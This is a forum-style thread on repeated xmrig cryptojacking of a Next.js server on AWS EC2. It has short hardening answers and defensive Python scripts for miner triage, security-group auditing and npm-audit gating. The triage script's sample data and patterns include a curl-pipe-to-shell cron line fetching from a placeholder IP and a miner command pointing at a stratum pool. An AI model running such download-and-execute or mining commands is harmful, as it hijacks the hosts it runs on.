We're running a Next.js tool on an AWS EC2 Linux instance, but we keep getting hit by cryptojackers like coinminer:linux/xmrig.aaa. It causes CPU spikes, and our only reliable fix so far has been terminating the instance and starting over. We've tried egress filtering, firewall hardening, and anti-malware solutions, but they come back after a while. What are the common ways these attackers are getting in, and what's a proper long-term solution to prevent this instead of continuously rebuilding the server?
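Before rebuilding again, it is worth pulling the artefacts the question describes (the high-CPU process and whatever re-launches it) off the box so the entry point can be worked out. The script below is an added example, not part of the original post: it parses `ps -eo pid,pcpu,user,args` output and cron lines and flags the indicators an xmrig-style miner usually leaves (the binary name, a `stratum+tcp://` pool URL, a binary executed from /tmp or /dev/shm, a curl-pipe-sh cron job). The indicator list is this example's own assumption, not a vendor signature, and the sample process table and crontab at the bottom are constructed (pool.invalid and 198.51.100.7 are placeholders).

```python
"""Triage a Linux host for cryptominer indicators in the process table and cron.

Added example, not from the original post. The indicator patterns are this
example's own assumptions about what an xmrig-style miner tends to leave
behind; they are not a signature from any product. SAMPLE_PS and SAMPLE_CRON
are constructed data, not captured from a real host.
"""
import re
import shutil
import subprocess

# Assumed command-line indicators.
MINER_CMD_PATTERNS = [
    re.compile(r"xmrig", re.I),
    re.compile(r"stratum\+(tcp|ssl)://", re.I),
    re.compile(r"--donate-level\b", re.I),
    re.compile(r"(^|\s)-o\s+\S+:\d{4,5}\b"),  # pool host:port given via -o
]
# A service binary should not be running from a scratch directory.
SUSPICIOUS_EXEC_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Cron persistence: download-and-run one-liners, or jobs in scratch dirs.
CRON_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I),
    re.compile(r"/(tmp|dev/shm|var/tmp)/"),
]


def parse_ps(text):
    """Parse `ps -eo pid,pcpu,user,args` output into a list of dicts."""
    procs = []
    for line in text.strip().splitlines()[1:]:  # first line is the header
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, pcpu, user, args = parts
        procs.append({"pid": int(pid), "pcpu": float(pcpu), "user": user, "args": args})
    return procs


def scan_processes(procs, cpu_threshold=80.0):
    """Return [{'pid', 'user', 'reasons'}] for processes worth a second look."""
    findings = []
    for p in procs:
        reasons = [f"cmdline matches /{pat.pattern}/"
                   for pat in MINER_CMD_PATTERNS if pat.search(p["args"])]
        exe = p["args"].split()[0]
        if exe.startswith(SUSPICIOUS_EXEC_DIRS):
            reasons.append(f"executed from {exe}")
        if p["pcpu"] >= cpu_threshold:
            reasons.append(f"{p['pcpu']:.0f}% CPU (inspect manually if this is the only reason)")
        if reasons:
            findings.append({"pid": p["pid"], "user": p["user"], "reasons": reasons})
    return findings


def scan_cron(lines):
    """Return [{'line', 'reason'}] for cron entries matching persistence patterns."""
    hits = []
    for line in lines:
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        for pat in CRON_PATTERNS:
            if pat.search(s):
                hits.append({"line": s, "reason": f"matches /{pat.pattern}/"})
                break
    return hits


# Constructed sample data (not captured from a real host).
SAMPLE_PS = """\
  PID %CPU USER     COMMAND
    1  0.0 root     /sbin/init
  812  2.1 ec2-user node /srv/app/node_modules/.bin/next start
 2231 97.5 ec2-user /tmp/.x/kthreaddi -o stratum+tcp://pool.invalid:3333 -u WALLETPLACEHOLDER --donate-level 1
 2240  0.3 root     /usr/sbin/sshd -D
"""
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 * * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh",
]


def live_ps():
    """Current process table, or '' if `ps` is unavailable."""
    if not shutil.which("ps"):
        return ""
    return subprocess.run(["ps", "-eo", "pid,pcpu,user,args"],
                          capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    for f in scan_processes(parse_ps(live_ps() or SAMPLE_PS)):
        print(f"pid {f['pid']} ({f['user']}): " + "; ".join(f["reasons"]))
    for h in scan_cron(SAMPLE_CRON):  # swap in `crontab -l` / /etc/cron.d contents on a real host
        print("cron:", h["line"], "->", h["reason"])
```

Run it on the live box before terminating it, and also dump `/etc/cron.d`, `/var/spool/cron`, `systemctl list-units --type=service`, and `/etc/ld.so.preload` by hand: where the miner is re-launched from usually says more about the entry point than the miner binary does.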
5 Answers
Consider using SSM instead of SSH entirely. This reduces the attack surface significantly and helps keep your instance secure.
It sounds like your EC2 instance might be in a public subnet with security groups open to the entire internet. Consider moving it to a private subnet and using Systems Manager for access instead. Also, update all your application packages regularly!
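The two answers above both come down to the same check: is port 22 (or everything) open to 0.0.0.0/0 or ::/0 on the instance's security group? The following is an added example, not code from either answer: it reads the JSON that `aws ec2 describe-security-groups` prints, lists every world-open rule that admits SSH, and builds the matching `aws ec2 revoke-security-group-ingress` call. The sample document at the bottom is constructed; its group IDs and CIDRs are placeholders.

```python
"""Audit EC2 security groups for SSH (or all-traffic) rules open to the internet.

Added example, not from the original answers. Input is the JSON that
`aws ec2 describe-security-groups` prints; SAMPLE below is constructed for
illustration, and its group IDs and CIDRs are placeholders.
"""
import json
import sys

WORLD = ("0.0.0.0/0", "::/0")


def covers_port(perm, port):
    """True if an IpPermissions entry admits TCP traffic to `port`."""
    proto = perm.get("IpProtocol")
    if proto == "-1":  # all protocols, all ports
        return True
    if proto not in ("tcp", "6"):
        return False
    return perm.get("FromPort", 0) <= port <= perm.get("ToPort", 65535)


def world_sources(perm):
    """CIDRs in the rule that mean 'anyone on the internet'."""
    cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
    cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
    return sorted(c for c in cidrs if c in WORLD)


def exposed_rules(describe_output, port=22):
    """Return one dict per (group, world CIDR) pair that exposes `port`."""
    hits = []
    for sg in describe_output.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            if not covers_port(perm, port):
                continue
            for cidr in world_sources(perm):
                hits.append({"group_id": sg["GroupId"], "group_name": sg.get("GroupName", ""),
                             "cidr": cidr, "protocol": perm["IpProtocol"],
                             "from_port": perm.get("FromPort"), "to_port": perm.get("ToPort")})
    return hits


def revoke_commands(hits):
    """aws CLI calls (shorthand --ip-permissions syntax) that remove exactly the offending rules."""
    cmds = []
    for h in hits:
        ranges = (f"Ipv6Ranges=[{{CidrIpv6={h['cidr']}}}]" if ":" in h["cidr"]
                  else f"IpRanges=[{{CidrIp={h['cidr']}}}]")
        if h["protocol"] == "-1":
            perm = f"IpProtocol=-1,{ranges}"
        else:
            perm = (f"IpProtocol={h['protocol']},FromPort={h['from_port']},"
                    f"ToPort={h['to_port']},{ranges}")
        cmds.append(f"aws ec2 revoke-security-group-ingress --group-id {h['group_id']} "
                    f"--ip-permissions '{perm}'")
    return cmds


# Constructed sample: one group with SSH open to the world, one locked down.
SAMPLE = {"SecurityGroups": [
    {"GroupId": "sg-0a1b2c3d4e5f60001", "GroupName": "web",
     "IpPermissions": [
         {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [], "UserIdGroupPairs": []},
         {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
          "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}],
          "UserIdGroupPairs": []}]},
    {"GroupId": "sg-0a1b2c3d4e5f60002", "GroupName": "bastion",
     "IpPermissions": [
         {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
          "IpRanges": [{"CidrIp": "203.0.113.0/24"}], "Ipv6Ranges": [], "UserIdGroupPairs": []},
         {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "10.0.0.0/16"}], "Ipv6Ranges": [],
          "UserIdGroupPairs": []}]}]}


if __name__ == "__main__":
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE
    found = exposed_rules(data)
    for h in found:
        print(f"{h['group_id']} ({h['group_name']}): port 22 open from {h['cidr']}")
    for cmd in revoke_commands(found):
        print(cmd)
    sys.exit(1 if found else 0)
```

Feed it the real output with `aws ec2 describe-security-groups --output json | python3 sg_audit.py`. Once port 22 is closed, reach the instance with `aws ssm start-session --target <instance-id>`; that needs the SSM agent running on the instance and an instance profile carrying the AmazonSSMManagedInstanceCore managed policy, and it works from a private subnet with no inbound rules at all.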
Check for vulnerabilities in your Next.js app or its dependencies. There have been a lot of supply chain attacks this year that could be affecting your server.
First off, make sure your SSH password isn't something like 'password'. It sounds basic, but you'd be surprised at how many people overlook this. If your security is too weak, cryptojackers can exploit that easily.
Next.js has seen some severe vulnerabilities lately, particularly with remote code execution. Keep your dependencies updated to avoid any security issues. You might want to bring in a security consultant to get a good handle on this.
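The last two answers (check the Next.js dependency tree, keep it patched) are easiest to make stick as a CI gate rather than a periodic reminder. The script below is an added example, not from either answer: it reads the report from `npm audit --json` (the `auditReportVersion: 2` shape that npm 7 and later emit) and exits non-zero when any finding is at or above a chosen severity, showing whether the finding is on a direct dependency or inherited and whether npm knows of a fix. The sample report is constructed; its package names, advisory titles and version ranges are placeholders, not real advisories.

```python
"""Gate a deploy on `npm audit --json` output.

Added example, not from the original answers. Reads the v2 audit report
(`auditReportVersion: 2`, npm 7+) and fails when any advisory is at or above
a chosen severity. SAMPLE_REPORT is constructed: package names, titles and
ranges are placeholders, not real advisories.
"""
import json
import sys

SEVERITY_RANK = {"info": 0, "low": 1, "moderate": 2, "high": 3, "critical": 4}


def failing_advisories(report, threshold="high"):
    """Return the vulnerable packages at or above `threshold`, worst first."""
    min_rank = SEVERITY_RANK[threshold]
    out = []
    for name, v in report.get("vulnerabilities", {}).items():
        sev = v.get("severity", "info")
        if SEVERITY_RANK.get(sev, 0) < min_rank:
            continue
        via = v.get("via", [])
        # `via` holds advisory objects for findings on this package itself and
        # bare package names for findings inherited from a dependency.
        out.append({
            "name": name,
            "severity": sev,
            "direct_dependency": bool(v.get("isDirect")),
            "vulnerable_range": v.get("range", ""),
            # fixAvailable is true, false, or a {name, version, isSemVerMajor} object
            "fix_available": bool(v.get("fixAvailable")),
            "advisories": [x.get("title", "") for x in via if isinstance(x, dict)],
            "inherited_from": [x for x in via if isinstance(x, str)],
        })
    out.sort(key=lambda e: (-SEVERITY_RANK[e["severity"]], e["name"]))
    return out


def gate(report, threshold="high"):
    """Exit status for CI: 0 when nothing is at/above threshold, else 1."""
    return 1 if failing_advisories(report, threshold) else 0


# Constructed sample report in the npm v2 audit shape (placeholders throughout).
SAMPLE_REPORT = {
    "auditReportVersion": 2,
    "vulnerabilities": {
        "example-parser": {
            "name": "example-parser", "severity": "high", "isDirect": False,
            "via": [{"title": "Placeholder advisory A", "severity": "high",
                     "url": "https://example.invalid/advisory/1"}],
            "effects": ["example-framework"], "range": "<2.0.0",
            "nodes": ["node_modules/example-parser"], "fixAvailable": True},
        "example-framework": {
            "name": "example-framework", "severity": "high", "isDirect": True,
            "via": ["example-parser"], "effects": [], "range": "<=1.4.0",
            "nodes": ["node_modules/example-framework"],
            "fixAvailable": {"name": "example-framework", "version": "2.0.0",
                             "isSemVerMajor": True}},
        "example-logger": {
            "name": "example-logger", "severity": "low", "isDirect": True,
            "via": [{"title": "Placeholder advisory B", "severity": "low",
                     "url": "https://example.invalid/advisory/2"}],
            "effects": [], "range": "<0.9.1",
            "nodes": ["node_modules/example-logger"], "fixAvailable": True},
    },
    "metadata": {"vulnerabilities": {"info": 0, "low": 1, "moderate": 0, "high": 2,
                                     "critical": 0, "total": 3}},
}


if __name__ == "__main__":
    report = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE_REPORT
    for e in failing_advisories(report):
        src = "direct" if e["direct_dependency"] else "via " + ", ".join(e["inherited_from"])
        print(f"{e['severity']:8} {e['name']} {e['vulnerable_range']} ({src}; "
              f"fix available: {e['fix_available']})")
    sys.exit(gate(report))
```

Wire it in as `npm audit --json | python3 audit_gate.py` in the pipeline that builds the image, so a vulnerable `next` or transitive dependency blocks the deploy instead of being found on the instance later; `npm audit fix` takes care of the non-breaking upgrades, and the `fix_available` object with `isSemVerMajor` tells you which ones need a deliberate major bump.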
